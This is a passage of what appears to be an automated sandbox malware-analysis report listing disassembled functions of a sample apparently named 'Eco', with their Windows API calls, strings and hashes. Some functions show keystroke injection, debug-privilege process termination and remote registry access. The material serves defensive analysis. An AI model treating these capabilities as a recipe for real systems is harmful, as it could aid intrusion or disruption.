                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 4b7c6a722e5cdfebf1d7ad827367047349f30b625b0cf82b8766b1901e5d4a22
                          • Instruction ID: 2fc8567cf3976b5ea4e96aee498ef2cb6245bf58fac86a8a5a7b57c276240f3b
                          • Opcode Fuzzy Hash: 4b7c6a722e5cdfebf1d7ad827367047349f30b625b0cf82b8766b1901e5d4a22
                          • Instruction Fuzzy Hash: 1751BC70605209BEEF209F28CC89BBD3FA5FB46364F240516F614EA1E1CF71AD989B50
                          Function 00512F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0054C568
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054C58A
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0054C5A2
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0054C5C0
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0054C5E1
                          • DestroyIcon.USER32(00000000), ref: 0054C5F0
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0054C60D
                          • DestroyIcon.USER32(?), ref: 0054C61C
                            • Part of subcall function 0059A89C: DeleteObject.GDI32(00000000), ref: 0059A8D5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                          • String ID:
                          • API String ID: 2819616528-0
                          • Opcode ID: e2c2167e2c01c1105966a32c1ffb4234e24160d014e179ac11c7061c0227d9fc
                          • Instruction ID: 3875edae6fb4f0507ab22d5e82b9f37692858cf734d2d8e5a93ba4895c17ae2b
                          • Opcode Fuzzy Hash: e2c2167e2c01c1105966a32c1ffb4234e24160d014e179ac11c7061c0227d9fc
                          • Instruction Fuzzy Hash: 37516670601209AFEB24DF24DC46BEA7FB5FB98310F104529F90697290DB71E9A5EB50
                          Function 0056A009 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0056B310: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056B330
                            • Part of subcall function 0056B310: GetCurrentThreadId.KERNEL32 ref: 0056B337
                            • Part of subcall function 0056B310: AttachThreadInput.USER32(00000000,?,0056A01E,?,00000001), ref: 0056B33E
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A029
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0056A046
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0056A049
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A052
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0056A070
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A073
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A07C
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0056A093
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A096
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: 5fc7590a41c3bab081a0c65e1a4d2bd14e060d41c770a0a44a2dd7cf34fce0e4
                          • Instruction ID: 1c9fe84c03200d07eeffe7515e62c1c1fb2e3061f0eb0e34b34bb738d33f7923
                          • Opcode Fuzzy Hash: 5fc7590a41c3bab081a0c65e1a4d2bd14e060d41c770a0a44a2dd7cf34fce0e4
                          • Instruction Fuzzy Hash: BB110871620218BEFA106F608C8DF6A3F1DEB8D7A4F101415F2406B1D0C9F25C60EEA4
                          Function 005692BC Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00568F3D,00000B00,?,?), ref: 005692C5
                          • HeapAlloc.KERNEL32(00000000,?,00568F3D,00000B00,?,?), ref: 005692CC
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00568F3D,00000B00,?,?), ref: 005692E1
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00568F3D,00000B00,?,?), ref: 005692E9
                          • DuplicateHandle.KERNEL32(00000000,?,00568F3D,00000B00,?,?), ref: 005692EC
                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00568F3D,00000B00,?,?), ref: 005692FC
                          • GetCurrentProcess.KERNEL32(00568F3D,00000000,?,00568F3D,00000B00,?,?), ref: 00569304
                          • DuplicateHandle.KERNEL32(00000000,?,00568F3D,00000B00,?,?), ref: 00569307
                          • CreateThread.KERNEL32(00000000,00000000,0056932D,00000000,00000000,00000000), ref: 00569321
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          • Opcode ID: 6fdb45ae621fb5c5ebc9c0abb5a2d66b75f559c3e99c90ed2367243f7fb3bb02
                          • Instruction ID: d4a670d29f7bb196f634fabae61a3a9842eb0e3aeb2e577565ae863171e04511
                          • Opcode Fuzzy Hash: 6fdb45ae621fb5c5ebc9c0abb5a2d66b75f559c3e99c90ed2367243f7fb3bb02
                          • Instruction Fuzzy Hash: 2401B6B5250308BFE710ABA5DC4DFAB7BACEB99711F409411FA05DB2E1DA74E804DB20
                          Function 005895C5 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2862541840-625585964
                          • Opcode ID: b2bb40900cacba4e48bf2afc414c80cd4b237ebb16e26f3c85a31468bd472707
                          • Instruction ID: 5ef7e3373f6aac6a695cb8b9e7c7d2fd1374999903a940dd62b147c7b2f20df6
                          • Opcode Fuzzy Hash: b2bb40900cacba4e48bf2afc414c80cd4b237ebb16e26f3c85a31468bd472707
                          • Instruction Fuzzy Hash: 3A919C70A0021AABDF24DFA5C848FAEBBB8FF46710F148559F915AB280D7709944CFA0
                          Function 0059716D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00597211
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00597225
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0059723F
                          • _wcscat.LIBCMT ref: 0059729A
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 005972B1
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005972DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: SysListView32
                          • API String ID: 307300125-78025650
                          • Opcode ID: f17d807846afa198c4982409e4ab88935f5ee382305384b44368cfe2e27bc177
                          • Instruction ID: d257044e233fa7b5cd0fc44c9b236d58112087d5e01326f45744206ac66a1f6c
                          • Opcode Fuzzy Hash: f17d807846afa198c4982409e4ab88935f5ee382305384b44368cfe2e27bc177
                          • Instruction Fuzzy Hash: B9419134A14308AFEF21DFA4CC89BEE7BA9FF48354F10082AF584A7191D7719D889B50
                          Function 0058EDE4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00573FB5: CreateToolhelp32Snapshot.KERNEL32 ref: 00573FDA
                            • Part of subcall function 00573FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00573FE8
                            • Part of subcall function 00573FB5: FindCloseChangeNotification.KERNEL32(00000000), ref: 005740B2
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE55
                          • GetLastError.KERNEL32 ref: 0058EE68
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE97
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0058EF14
                          • GetLastError.KERNEL32(00000000), ref: 0058EF1F
                          • CloseHandle.KERNEL32(00000000), ref: 0058EF54
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 1701285019-2896544425
                          • Opcode ID: 8361664141d7fa8b0a091de4b5f1eaa291e9fb5c0b0f8dcec75430c2948feb93
                          • Instruction ID: 86d6fb1c90a00584bb4f62e343837ddea50e0ce2f748001bcae4671b1cd9b889
                          • Opcode Fuzzy Hash: 8361664141d7fa8b0a091de4b5f1eaa291e9fb5c0b0f8dcec75430c2948feb93
                          • Instruction Fuzzy Hash: A9419D712042029FDB15EF24EC9AF6DBBA5BF81314F048419F9066B2D2CB75A848DF91
                          Function 00574655 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0057466F
                          • LoadStringW.USER32(00000000), ref: 00574676
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057468C
                          • LoadStringW.USER32(00000000), ref: 00574693
                          • _wprintf.LIBCMT ref: 005746B9
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005746D7
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 005746B4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: 4bb4cd1fdf43a95d476d3cf671dbef2585695f2de291194517f6ae9cb997b6e4
                          • Instruction ID: c4641319ea5be291ee17deb02ce4c8516c384df9c3d54111ef530f041bbb1f64
                          • Opcode Fuzzy Hash: 4bb4cd1fdf43a95d476d3cf671dbef2585695f2de291194517f6ae9cb997b6e4
                          • Instruction Fuzzy Hash: AD0186F69503087FE711AB909D89EF77B6CE74A300F004595B749D3081EA745E889F70
                          Function 0059D861 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetSystemMetrics.USER32(0000000F), ref: 0059D89F
                          • GetSystemMetrics.USER32(0000000F), ref: 0059D8BF
                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0059DAFA
                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0059DB18
                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0059DB39
                          • ShowWindow.USER32(00000003,00000000), ref: 0059DB58
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0059DB7D
                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0059DBA0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                          • String ID:
                          • API String ID: 1211466189-0
                          • Opcode ID: 4138b7020d44c40bc83eb5664c11ce996d1246f2f8e2ff9b8028fbbdeebbb9e4
                          • Instruction ID: 82a7ee48b390bfa0ad9eb80e5c537b246c964624baaf0ae78543ef92b5b5078a
                          • Opcode Fuzzy Hash: 4138b7020d44c40bc83eb5664c11ce996d1246f2f8e2ff9b8028fbbdeebbb9e4
                          • Instruction Fuzzy Hash: 25B1AA31600219EFDF14CF68C9857BE7BB2FF08711F09816AED489B299D734A994DB60
                          Function 00590139 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590216
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3479070676-0
                          • Opcode ID: d3bebbadc258faf3f5baf65f53fa973c6ae15a10bbd1fdf81409567ec7a8650a
                          • Instruction ID: 6d9bba47c9625317b553b6d148cf1eb7d227241f3dcf9e01c3ac790c62dc19d0
                          • Opcode Fuzzy Hash: d3bebbadc258faf3f5baf65f53fa973c6ae15a10bbd1fdf81409567ec7a8650a
                          • Instruction Fuzzy Hash: 2CA199702042029FCB10EF54D889B6EBBE5BF95314F14881DF9969B2E2DB31E945CF82
                          Function 00512E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000), ref: 00512E9F
                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000,000000FF), ref: 00512EE7
                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000), ref: 0054C48B
                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000), ref: 0054C4F7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 1ccdf2be821e6b1913580cb579b77d31ed14b72b9919b6ab835542fd20e15b2d
                          • Instruction ID: a0b158705d401eb398120a7d2fc23ef9df9c92c319b184330c37de91b0d66c9d
                          • Opcode Fuzzy Hash: 1ccdf2be821e6b1913580cb579b77d31ed14b72b9919b6ab835542fd20e15b2d
                          • Instruction Fuzzy Hash: AB412D306056809EEF758728C9C87FA7FDABBD2304F148A0DE447865A0D735A8E9E710
                          Function 005774EE Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00577505
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0057753C
                          • EnterCriticalSection.KERNEL32(?), ref: 00577558
                          • _memmove.LIBCMT ref: 005775A6
                          • _memmove.LIBCMT ref: 005775C3
                          • LeaveCriticalSection.KERNEL32(?), ref: 005775D2
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005775E7
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00577606
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 256516436-0
                          • Opcode ID: a4a5f5828cfa747a5526a474393a878f5ee1422e95bf278d26772d48befe9aa3
                          • Instruction ID: cb8eed554b0e7695dc5199e1f58eb7e03b3fdd1f243b2e61ad698b892bb2ec07
                          • Opcode Fuzzy Hash: a4a5f5828cfa747a5526a474393a878f5ee1422e95bf278d26772d48befe9aa3
                          • Instruction Fuzzy Hash: 0F315471904209AFDB10DF54DC89EAEBB78FF85710F1480A5F904AB296D770DE15DBA0
                          Function 005965C0 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 005965D8
                          • GetDC.USER32(00000000), ref: 005965E0
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005965EB
                          • ReleaseDC.USER32(00000000,00000000), ref: 005965F7
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00596633
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00596644
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00599417,?,?,000000FF,00000000,?,000000FF,?), ref: 0059667E
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0059669E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: c68add88ba8f4219a1383391d8c75cc14313502293087126f2c029c48b9eba12
                          • Instruction ID: 294a0cce908abb7f1ce1f9c8668106d1a599a5797858b26bb4f7f8390b7112ea
                          • Opcode Fuzzy Hash: c68add88ba8f4219a1383391d8c75cc14313502293087126f2c029c48b9eba12
                          • Instruction Fuzzy Hash: FE317872211214AFEF118F10CC8AFAA3FA9FF5A765F084055FE08AA291C6759855CBB4
                          Function 0056C52B Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: d9f2aa4ae12ff8d670cb61780f913821d495e24e4f3a70728db98377f6068f5b
                          • Instruction ID: cb3471884cb02d373f4b4cd776cfa451549788f70449af3935f38f8c9f2a74e7
                          • Opcode Fuzzy Hash: d9f2aa4ae12ff8d670cb61780f913821d495e24e4f3a70728db98377f6068f5b
                          • Instruction Fuzzy Hash: E021CF71A016067BA62066298D42FBF3F5CBEA1798F004066FD47E7242FB50EE1186BD
                          Function 0057EFD3 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                          • _wcstok.LIBCMT ref: 0057F144
                          • _wcscpy.LIBCMT ref: 0057F1D3
                          • _memset.LIBCMT ref: 0057F206
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          • Opcode ID: 25b4bcc958405ee3a9780035f44a2454df72f09060479ca4fc0442341cbec626
                          • Instruction ID: b211111ac3f056d01f6c1e1bec975d9d2a562b222f9457229d5e24ca68af5bed
                          • Opcode Fuzzy Hash: 25b4bcc958405ee3a9780035f44a2454df72f09060479ca4fc0442341cbec626
